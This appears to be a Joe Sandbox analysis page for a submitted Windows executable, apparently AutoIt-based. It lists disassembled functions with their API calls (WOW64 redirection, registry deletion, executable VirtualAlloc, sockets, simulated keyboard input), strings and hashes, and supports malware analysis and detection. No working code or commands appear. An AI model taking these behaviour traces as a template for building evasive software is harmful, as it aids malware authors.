Opcode ID: dbe5259ab23c4ea95ea7c6eeba333dcd7a7bc34eaefc4761cae26614106ce2b8
Instruction ID: 125c3378273700937efe1f5623807d0203cb6ad6784d882bb1df6c3a0e7b469d
Opcode Fuzzy Hash: dbe5259ab23c4ea95ea7c6eeba333dcd7a7bc34eaefc4761cae26614106ce2b8
Instruction Fuzzy Hash: D2F0C875204623CBFB259F15BC51B672795EB10B34B11001FEA04CE290FB38A8455ECE

Function 00469B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 00469B94

Part of subcall function 00469C0B: __mtinitlocknum.LIBCMT ref: 00469C1D
Part of subcall function 00469C0B: EnterCriticalSection.KERNEL32(00000000,?,00469A7C,0000000D), ref: 00469C36

__updatetlocinfoEx_nolock.LIBCMT ref: 00469BA4

Part of subcall function 00469100: ___addlocaleref.LIBCMT ref: 0046911C
Part of subcall function 00469100: ___removelocaleref.LIBCMT ref: 00469127
Part of subcall function 00469100: ___freetlocinfo.LIBCMT ref: 0046913B

Strings

8O, xrefs: 00469B8A, 00469B9F, 00469BAB
8O, xrefs: 00469B85

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
String ID: 8O$8O
API String ID: 547918592-2916111411
Opcode ID: 8edb8cc8cd16bc12bac2151ff3e2c11a21da49838857d6fd52632d3af47b3ab0
Instruction ID: 839eb1b2bb3edfba83c20d63740d32cd8159dc1cbcb8972b73c8eae2a7172dda
Opcode Fuzzy Hash: 8edb8cc8cd16bc12bac2151ff3e2c11a21da49838857d6fd52632d3af47b3ab0
Instruction Fuzzy Hash: E1E086B1543304EDEB10FBA6A90376927546B00B26F30125FF155950D1EEBC2900C51F

Function 00444C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00444BD0,?,00444DEF,?,005052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00444C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00444C23

Strings

kernel32.dll, xrefs: 00444C0C
Wow64DisableWow64FsRedirection, xrefs: 00444C1D

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 699fc534ed883bc0c4eecc6e701eaa5f964589dd3bbb94f38c472b0ab6d91b52
Instruction ID: 4495d07714aaac9a2682d81791e1b23dd7275e8f00cc1ec9cf4a25b6462698b6
Opcode Fuzzy Hash: 699fc534ed883bc0c4eecc6e701eaa5f964589dd3bbb94f38c472b0ab6d91b52
Instruction Fuzzy Hash: 02D08C34900712CFD7205B70D848B07BAD6EF08341B19883A9482C2650EAB8D8848618

Function 00444C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00444B83,?), ref: 00444C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00444C56

Strings

kernel32.dll, xrefs: 00444C3F
Wow64RevertWow64FsRedirection, xrefs: 00444C50

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 427d2a7000b53f0030660ec170ed933e62494e856d941c52ba8835dbd1322176
Instruction ID: 439fcbface90364b207b32723aa6c1b08e2dea37332cfbca0c6e2f425ccd08a7
Opcode Fuzzy Hash: 427d2a7000b53f0030660ec170ed933e62494e856d941c52ba8835dbd1322176
Instruction Fuzzy Hash: 26D0C730500723CFE7208F31C848B0BB6E6AF00340B2AC83F9592C6268EB7CD884CA18

Function 004C0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,004C1039), ref: 004C0DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004C0E07

Strings

RegDeleteKeyExW, xrefs: 004C0E01
advapi32.dll, xrefs: 004C0DF0

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: fc2a21a58d1caeef5c57ce7f34cd87dfae3a90e8a37d9d2a4f8618f5275f3fac
Instruction ID: 47eb0edaa0b565db46399cfc6d1f178eabe1b295a0c74dc04cec23676465de1e
Opcode Fuzzy Hash: fc2a21a58d1caeef5c57ce7f34cd87dfae3a90e8a37d9d2a4f8618f5275f3fac
Instruction Fuzzy Hash: 75D0C739440326DFC3208F70C808B8372E6AF00342F248C3F9582C6250EBB8DC90CA08

Function 004B90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,004B8CF4,?,004CF910), ref: 004B90EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 004B9100

Strings

kernel32.dll, xrefs: 004B90E9
GetModuleHandleExW, xrefs: 004B90FA

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 44daf0c4d303e7bf7869635d0afa2bf9209680ba0f46901669780440306a0749
Instruction ID: d4865544c50270809c5dc76e15bd5842b0adbee42ce4c5e804aba909743d3ed0
Opcode Fuzzy Hash: 44daf0c4d303e7bf7869635d0afa2bf9209680ba0f46901669780440306a0749
Instruction Fuzzy Hash: 5DD0C234510323DFD7208F34C808A4372D5AF00341B15C83FD582C6650EB7CCC80C664

Function 00481714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00481718
__swprintf.LIBCMT ref: 00481749

Strings

WIN_XPe, xrefs: 00481788
%.3d, xrefs: 00481723

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 5c8f49a6830dc0e0297fb8ab74169aeb71e3480b3e58f27bff746d2a5a19014d
Instruction ID: 66e137b8beb06de78523b8a0f8aca48b2ae310f7c6fbdfb8e48608bf7d612ea8
Opcode Fuzzy Hash: 5c8f49a6830dc0e0297fb8ab74169aeb71e3480b3e58f27bff746d2a5a19014d
Instruction Fuzzy Hash: A4D01271805119FAD750AB909888DBD737CA708301F140C67B50692060E32D9B57E72F

Function 0049717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4259980e6eb311862e0f3d7d8f62b2a3c5cf36463bf3b70f809f4ea2e7045e9
Instruction ID: b9a5171155e9e055d6dec95bd9cc066c234bd104c80f9be3c66c580be06eab61
Opcode Fuzzy Hash: e4259980e6eb311862e0f3d7d8f62b2a3c5cf36463bf3b70f809f4ea2e7045e9
Instruction Fuzzy Hash: B8C14974A14216EFCB14CFA4C884AAEBBB5FF48704B1485AAE805EB351D734ED81DB94

Function 004BE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 004BE0BE
CharLowerBuffW.USER32(?,?), ref: 004BE101

Part of subcall function 004BD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 004BD7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 004BE301
_memmove.LIBCMT ref: 004BE314

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 1d7d34856a07d304cec4d83fc61ca9ab2994e85f5f9718503048348a29a2be12
Instruction ID: 36d907e5b7f5c3dc092091e3635264e562178d9c2f7a5ab74dc81973b7fe45b0
Opcode Fuzzy Hash: 1d7d34856a07d304cec4d83fc61ca9ab2994e85f5f9718503048348a29a2be12
Instruction Fuzzy Hash: 53C17A716083019FC704DF29C4809AABBE4FF89718F14896EF8999B351D735ED06CB96

Function 004B8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004B80C3
CoUninitialize.OLE32 ref: 004B80CE

Part of subcall function 0049D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0049D5D4

VariantInit.OLEAUT32(?), ref: 004B80D9
VariantClear.OLEAUT32(?), ref: 004B83AA

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: dc54dcd1d0259b528d30bc4d8168fa281b93af29ee740e0ea37538fbc7503dd9
Instruction ID: 3d0353162f2c3b8afd9ba9f143b08c3cc27d05e975720ac49bf17eed539b3460
Opcode Fuzzy Hash: dc54dcd1d0259b528d30bc4d8168fa281b93af29ee740e0ea37538fbc7503dd9
Instruction Fuzzy Hash: 38A19B756047019FDB10EF19C881B6AB7E8BF89318F04445EF9959B3A1CB39EC05CB5A

Function 0049687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0049688E
SysAllocString.OLEAUT32(00000000), ref: 00496937
VariantCopy.OLEAUT32 ref: 00496966
VariantClear.OLEAUT32(?), ref: 0049698D

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 906cdefae5a9c73631f31903bb3ebf2d6d343b1b46bbf0c8d9da4ecc330c73be
Instruction ID: c02b108c864b6ffa3fa496601d3c55c47d3cce5ec23375287d82eadc366e64fa
Opcode Fuzzy Hash: 906cdefae5a9c73631f31903bb3ebf2d6d343b1b46bbf0c8d9da4ecc330c73be
Instruction Fuzzy Hash: 4051B1746003019ADF24AF66D895A2FBBA6AF46314F21C83FE596DB291DB3CDC41870D

Function 004C97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00ADE480,?), ref: 004C9863
ScreenToClient.USER32(00000002,00000002), ref: 004C9896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 004C9903

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: dc3c20864d95511064be7dec298085b28b08462b2e957cd3534ea2586741c873
Instruction ID: 20d429095e3c221fcdf9b4419fd493aeff594d7f49bcd7d4dd3f19d52fab724d
Opcode Fuzzy Hash: dc3c20864d95511064be7dec298085b28b08462b2e957cd3534ea2586741c873
Instruction Fuzzy Hash: 5D511A78A00209AFDF50DF64C888EAE7BA6EF55360F14816EF8559B3A0D734AD41CB94

Function 00499A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00499AD2
__itow.LIBCMT ref: 00499B03

Part of subcall function 00499D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00499DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00499B6C
__itow.LIBCMT ref: 00499BC3

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: e8fd48d330a986f819bae5b4a9bb8b15f64507b2128b84c6d0b24c6280a4eb4f
Instruction ID: 10ecbeb2b149b6eaf1b50f6194f5f845c83c2556e65ad1318e74ef5eea4650e7
Opcode Fuzzy Hash: e8fd48d330a986f819bae5b4a9bb8b15f64507b2128b84c6d0b24c6280a4eb4f
Instruction Fuzzy Hash: EE415174A00208ABEF11DF55D885BEE7FB9EF44714F00006EF905A7291DB78AE45CBA9

Function 004B69AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 004B69D1
WSAGetLastError.WSOCK32(00000000), ref: 004B69E1

Part of subcall function 00449837: __itow.LIBCMT ref: 00449862
Part of subcall function 00449837: __swprintf.LIBCMT ref: 004498AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 004B6A45
WSAGetLastError.WSOCK32(00000000), ref: 004B6A51

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: c8ec5281d223b0028fe07424cf79c1af714eaa6a6300fa67a6d90c119f4c383b
Instruction ID: 1ecf0e0cf8a8f788ac6959cef30e2141e832e013eb18cec2db13584c701218e8
Opcode Fuzzy Hash: c8ec5281d223b0028fe07424cf79c1af714eaa6a6300fa67a6d90c119f4c383b
Instruction Fuzzy Hash: B441A3757402006FEB60BF25CC87F6E77A49B05B18F04842EFA19AB3C3DA789D009759

Function 004B641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,004CF910), ref: 004B64A7
_strlen.LIBCMT ref: 004B64D9

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 99e1839b5646e2be80835da8c397c0d280ab03f8b5d15831bd578e750be082a5
Instruction ID: d88e9624061eea5db6a5dd8ba9f309758218cd83d75c2baad5682823b58d1642
Opcode Fuzzy Hash: 99e1839b5646e2be80835da8c397c0d280ab03f8b5d15831bd578e750be082a5
Instruction Fuzzy Hash: 7441D671500104ABDB24EBA5EC85FEEB7A9AF04314F11816FF81597292DB3CAD14CB69

Function 004AB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 004AB89E
GetLastError.KERNEL32(?,00000000), ref: 004AB8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004AB8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004AB915

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 388ddc98c90e581609b348b9295d78b3ac505ff4c8c4c3ba448fa2fab97ef446
Instruction ID: 23d0789b6db940d12f16f8388be8f773ed412292fc2dc64c02ec047a9f2128c1
Opcode Fuzzy Hash: 388ddc98c90e581609b348b9295d78b3ac505ff4c8c4c3ba448fa2fab97ef446
Instruction Fuzzy Hash: 08414F39600610DFDB11EF19C444A5EBBE1EF9A314F05809AEC4A9B362CB39FD05DB99

Function 004C8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004C88DE

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: f6bd7a91127dee1629b8d1c09bab7659f4b6ef7ff67f7951b2a254176ea676ec
Instruction ID: 8e41d9b8cef7af23654fde7cd9ca73b02f7409cc8ba4e53f3ff4aa8e11f9333c
Opcode Fuzzy Hash: f6bd7a91127dee1629b8d1c09bab7659f4b6ef7ff67f7951b2a254176ea676ec
Instruction Fuzzy Hash: 0C31C57C600108AEEBA09A54CC45FBE77A5FB09310F94412FFA11D62A1CF7899419B5B

Function 004CAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 004CAB60
GetWindowRect.USER32(?,?), ref: 004CABD6
PtInRect.USER32(?,?,004CC014), ref: 004CABE6
MessageBeep.USER32(00000000), ref: 004CAC57

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: f8ce2334546ac16f021d723ca8632087b3b5ec830d8fdcf2e3fcf5205bc94ed2
Instruction ID: 28273efcc9c1413a025833dd75e0e0944f71305c22d79ca9d44bc5a5552533af
Opcode Fuzzy Hash: f8ce2334546ac16f021d723ca8632087b3b5ec830d8fdcf2e3fcf5205bc94ed2
Instruction Fuzzy Hash: 38418B3860011C9FCB51CF58C884F6A7BF6FF48308F2881AEE9149B260D734A855DF9A

Function 004A0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 004A0B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 004A0B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 004A0BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 004A0BFB

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

